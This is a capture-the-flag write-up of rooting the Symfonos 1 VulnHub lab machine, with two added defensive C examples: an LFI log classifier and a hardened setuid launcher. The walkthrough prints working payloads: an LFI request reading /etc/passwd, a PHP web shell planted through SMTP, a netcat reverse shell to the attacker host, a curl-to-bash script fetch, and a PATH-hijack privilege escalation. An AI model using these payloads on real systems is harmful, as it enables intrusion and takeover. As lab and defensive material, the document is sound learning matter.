Symfonos 1

This VM was recently added to VulnHub and is advertised as a machine based on a real-life scenario, designed to teach an interesting way of obtaining a low-privilege shell. The level is beginner, but as it is the first part of a series, I like to do every part.
Enumeration
I start with a port scan to get an overview of which ports are open on the system and which services are running behind them.
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:2A:D4:AA (VMware)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m57s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-08-01T04:16:29-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-08-01 11:16:29
|_  start_date: N/A
These ports are open:
- port 22, which runs a recent version of OpenSSH
- port 25, which runs a Postfix SMTP server (the scan shows no version number)
- port 80, which runs an Apache2 webserver, version 2.4.25
- port 139, NetBIOS session service, Samba smbd version 3.x – 4.x
- port 445, Samba version 4.5.16-Debian
Webserver
Let’s start with the webserver. The website itself is nothing more than a picture. There is nothing in the source, and the picture itself seems to hold no hidden features.
root@cyberspace:~/symfonos1# dirsearch -u http://10.10.10.10 -e html,htm,php,txt -x 403,404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: html, htm, php, txt | HTTP method: get | Threads: 10 | Wordlist size: 207627

Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_11-38-22.log

Target: http://10.10.10.10

[11:38:22] Starting:
[11:38:22] 200 -  328B - /
[11:38:24] 301 -  311B - /manual  ->  http://10.10.10.10/manual/

Task Completed
Neither dirsearch nor Nikto shows anything interesting. For now, I turn my focus to another port.
Samba
To enumerate the SMB server I use smbmap.
root@cyberspace:~/symfonos1# smbmap -r -H 10.10.10.10
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.10...
[+] IP: 10.10.10.10:445	Name: 10.10.10.10
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	helios                                            	NO ACCESS
	anonymous                                         	READ ONLY
	./
	dr--r--r--                0 Sat Jun 29 03:14:49 2019	.
	dr--r--r--                0 Sat Jun 29 03:12:15 2019	..
	fr--r--r--              154 Sat Jun 29 03:14:49 2019	attention.txt
	IPC$                                              	NO ACCESS
It looks like there is a document that I can download.
root@cyberspace:~/symfonos1/smb# smbclient \\\\10.10.10.10\\anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 03:14:49 2019
  ..                                  D        0  Sat Jun 29 03:12:15 2019
  attention.txt                       N      154  Sat Jun 29 03:14:49 2019

		19994224 blocks of size 1024. 17259504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec)
smb: \> quit
root@cyberspace:~/symfonos1/smb# cat attention.txt

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!

Next person I find using one of these passwords will be fired!

-Zeus
That’s a nice hint about certain passwords. The name Zeus also suggests that the usernames are Greek gods. Let’s put these so-called passwords into a file. One of the shares is called helios; let’s see if helios also uses one of these weak passwords.
root@cyberspace:~/symfonos1# smbclient \\\\10.10.10.10\\helios -U helios
Enter WORKGROUP\helios's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 02:32:05 2019
  ..                                  D        0  Sat Jun 29 02:37:04 2019
  research.txt                        A      432  Sat Jun 29 02:32:05 2019
  todo.txt                            A       52  Sat Jun 29 02:32:05 2019

		19994224 blocks of size 1024. 17259504 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (140.6 KiloBytes/sec) (average 140.6 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 94.5 KiloBytes/sec)
It looks like the user ‘helios’ uses one of the weak passwords.
root@cyberspace:~/symfonos1/smb# cat research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
root@cyberspace:~/symfonos1/smb# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
It looks like he is working on a folder called /h3l105. Let’s check whether this folder exists on the webserver.
WordPress
root@cyberspace:~/symfonos1# dirsearch -u 10.10.10.10/h3l105 -e php -f -x 403,404

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301

Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_12-16-51.log

Target: 10.10.10.10/h3l105

[12:16:51] Starting:
[12:17:03] 301 -    0B  - /h3l105/index.php  ->  http://10.10.10.10/h3l105/
[12:17:03] 301 -    0B  - /h3l105/index.php/  ->  http://10.10.10.10/h3l105/
[12:17:12] 200 -    0B  - /h3l105/wp-content/
[12:17:12] 500 -    3KB - /h3l105/wp-admin/setup-config.php/
[12:17:12] 302 -    0B  - /h3l105/wp-admin/  ->  http://symfonos.local/h3l105/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.10%2Fh3l105%2Fwp-admin%2F&reauth=1
[12:17:12] 200 -    0B  - /h3l105/wp-config.php
[12:17:12] 200 -   69B  - /h3l105/wp-content/plugins/akismet/akismet.php/
[12:17:12] 200 -    1KB - /h3l105/wp-admin/install.php/
[12:17:12] 200 -    1KB - /h3l105/wp-content/uploads/
[12:17:12] 500 -    0B  - /h3l105/wp-includes/rss-functions.php/
[12:17:12] 200 -   44KB - /h3l105/wp-includes/
[12:17:12] 200 -    3KB - /h3l105/wp-login.php/
[12:17:12] 200 -    3KB - /h3l105/wp-login.php
[12:17:12] 405 -   42B  - /h3l105/xmlrpc.php/

Task Completed
It looks like a WordPress site. Running wpscan turns up several vulnerabilities and a username (admin).
[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8609
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
root@cyberspace:~/symfonos1/web# searchsploit mail masta
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion        | exploits/php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection               | exploits/php/webapps/41438.txt
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Here the information about the possible exploits is available. The LFI is easy to test.
root@cyberspace:~/symfonos1/web# curl -s http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
This works. But for this vulnerability to be useful, I need either files containing credentials or a way to plant a payload that I can trigger through the include.
SMTP
From the /etc/passwd file, I know there is a user named helios. I can try to send this user a message through the mail server. The content of this message will be a web shell, which hopefully gives me the opportunity to execute commands through the LFI. Information about web shells is plentiful on the internet. Here is an example.
root@cyberspace:~/symfonos1# nc 10.10.10.10 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO
501 Syntax: HELO hostname
MAIL FROM: n0w4n
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as A57AF408A1
QUIT
221 2.0.0 Bye
Next, I start a listener.
root@cyberspace:~/symfonos1# nc -lvnp 9001
listening on [any] 9001 ...
And now to trigger the payload.
root@cyberspace:~/symfonos1# curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc 10.10.10.13 9001 -e /bin/bash"
root@cyberspace:~/symfonos1# nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.10.13] from (UNKNOWN) [10.10.10.10] 54432
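From the defender's side, the whole chain above leaves a clear trace in the Apache access log: requests to the Mail Masta endpoint whose pl= parameter is an absolute path, a traversal, or the mail spool, with a cmd= parameter riding along. The classifier below is an added example, not part of the write-up; the log lines it checks are constructed to mirror the requests shown above.

```c
#include <string.h>

/* Findings for one access-log request line (OR'ed together). */
enum { LFI_ABS_PATH = 1, LFI_TRAVERSAL = 2, LFI_MAIL_SPOOL = 4, LFI_CMD_PARAM = 8 };

/* Copy the value of query parameter `name` (text after "name=" up to the next
 * '&', space or quote) into out. Returns 1 if the parameter is present. */
static int query_param(const char *line, const char *name, char *out, size_t outsz)
{
    const char *q = strchr(line, '?');
    size_t n = strlen(name);
    for (const char *p = q ? strstr(q, name) : NULL; p; p = strstr(p + 1, name)) {
        if ((p[-1] == '?' || p[-1] == '&') && p[n] == '=') {
            size_t len = strcspn(p + n + 1, "& \"");
            if (len >= outsz) len = outsz - 1;
            memcpy(out, p + n + 1, len);
            out[len] = '\0';
            return 1;
        }
    }
    return 0;
}

/* Classify one request line. pl= is Mail Masta's include parameter; cmd= is what
 * the mailed web shell reads. Returns an OR of the LFI_* flags, 0 for clean. */
int classify_request(const char *line)
{
    char val[512];
    int flags = 0;
    if (query_param(line, "pl", val, sizeof val)) {
        if (val[0] == '/' || strncmp(val, "%2F", 3) == 0 || strncmp(val, "%2f", 3) == 0)
            flags |= LFI_ABS_PATH;
        if (strstr(val, ".."))
            flags |= LFI_TRAVERSAL;
        if (strstr(val, "/var/mail/") || strstr(val, "/var/spool/mail/"))
            flags |= LFI_MAIL_SPOOL;
        if (flags && query_param(line, "cmd", val, sizeof val))
            flags |= LFI_CMD_PARAM;
    }
    return flags;
}

/* Constructed sample lines modelled on the write-up's requests, not real logs. */
static const char *SAMPLE_LINES[] = {
    "10.10.10.13 - - [01/Aug/2019:12:30:01 -0500] \"GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1\" 200 2121",
    "10.10.10.13 - - [01/Aug/2019:12:35:44 -0500] \"GET /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id HTTP/1.1\" 200 512",
    "10.10.10.13 - - [01/Aug/2019:12:36:10 -0500] \"GET /h3l105/wp-login.php HTTP/1.1\" 200 3240",
};
```

The mail spool flag is the one that distinguishes this log-poisoning variant from a plain file read: a second indicator lives in the Postfix log, where the queued message from an unknown HELO arrives moments before the matching request.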
Escalation of Privileges
id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
python -c 'import pty;pty.spawn("/bin/bash");'
<ml/h3l105/wp-content/plugins/mail-masta/inc/lists$
To enumerate the system quickly, I use a shell script called “LinEnum”. To run it on the remote system, I start Python’s SimpleHTTPServer on my local machine and curl the script from the remote system. Because I pipe it straight into bash, I don’t have to save the file on the target, which would leave traces.
helios@symfonos:/tmp$ curl -s http://10.10.10.13:9002/linenum.sh | bash
There is a lot of information, but the most interesting part is a file with the SUID bit set.
helios@symfonos:/tmp$ find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
< -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus  42992 Jun  9 16:42 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root       440728 Mar  1 10:19 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root        59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root        75792 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root        40504 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root        50040 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root         8640 Jun 28 20:21 /opt/statuscheck
-rwsr-xr-x 1 root root        44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root        31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root        40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root        61240 Nov 10  2016 /bin/ping
The file of interest is /opt/statuscheck. This is not a well-known SUID binary and deserves a closer look.
helios@symfonos:/tmp$ file /opt/statuscheck
file /opt/statuscheck
/opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 15:28:28 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html
This looks like the output of a curl command.
helios@symfonos:/tmp$ curl -I 10.10.10.10
curl -I 10.10.10.10
HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 15:30:47 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html
Now to use this to my advantage. For this I will abuse the PATH variable. First I create a file called curl, because I know that statuscheck calls curl, and I set all the permission bits on it.
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
Then I prepend /tmp to PATH. statuscheck searches the PATH folders in order for a file called curl; because /tmp now comes first, it will treat my file as the curl it needs to execute.
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
Then run the program and get root.
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# whoami
whoami
root
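The write-up never shows the source of /opt/statuscheck, but its behaviour implies a setuid-root program that lets the shell resolve "curl" through the caller's PATH. As an added example (not the VM's own code), here is that inferred pattern next to the hardened form a developer should have used: an absolute path, no shell, and a fixed environment, so a prepended /tmp changes nothing.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* The pattern inferred for /opt/statuscheck: a relative command name handed to
 * the shell, so "curl" is looked up in the caller's PATH and /tmp/curl wins. */
int statuscheck_unsafe(const char *host)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "curl -I %s", host);  /* relative name, inherited env */
    return system(cmd);                              /* runs as root under setuid */
}

/* Hardened launcher: absolute path, no shell, and a fixed minimal environment,
 * so PATH, LD_PRELOAD, IFS and friends from the caller never reach the child.
 * Returns the child's exit status, 127 if exec fails, -1 on fork/wait error. */
int run_fixed_env(const char *path, char *const argv[])
{
    static char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, envp);  /* only returns on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* What statuscheck should have done. */
int statuscheck_safe(const char *host)
{
    char *const argv[] = { "curl", "-I", (char *)host, NULL };
    return run_fixed_env("/usr/bin/curl", argv);
}

/* Self-check: poison PATH the way the write-up does, then ask a child shell which
 * PATH it really sees. Returns 1 when the child only saw the fixed PATH. */
int child_sees_fixed_path(void)
{
    setenv("PATH", "/tmp:/usr/bin:/bin", 1);
    char *const argv[] = { "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL };
    return run_fixed_env("/bin/sh", argv) == 0;
}
```

For an audit, the same property can be checked on a binary you cannot rebuild: an unusual setuid file whose strings contain a bare command name rather than an absolute path is the thing to flag.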
Now to finish this challenge.
# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:1!
[ASCII art]
Contact me via Twitter @zayotic to give feedback!
This was a nice challenge to start with. Since there are two more, Symfonos 2 will be next. Thanks to @zayotic for a fun challenge.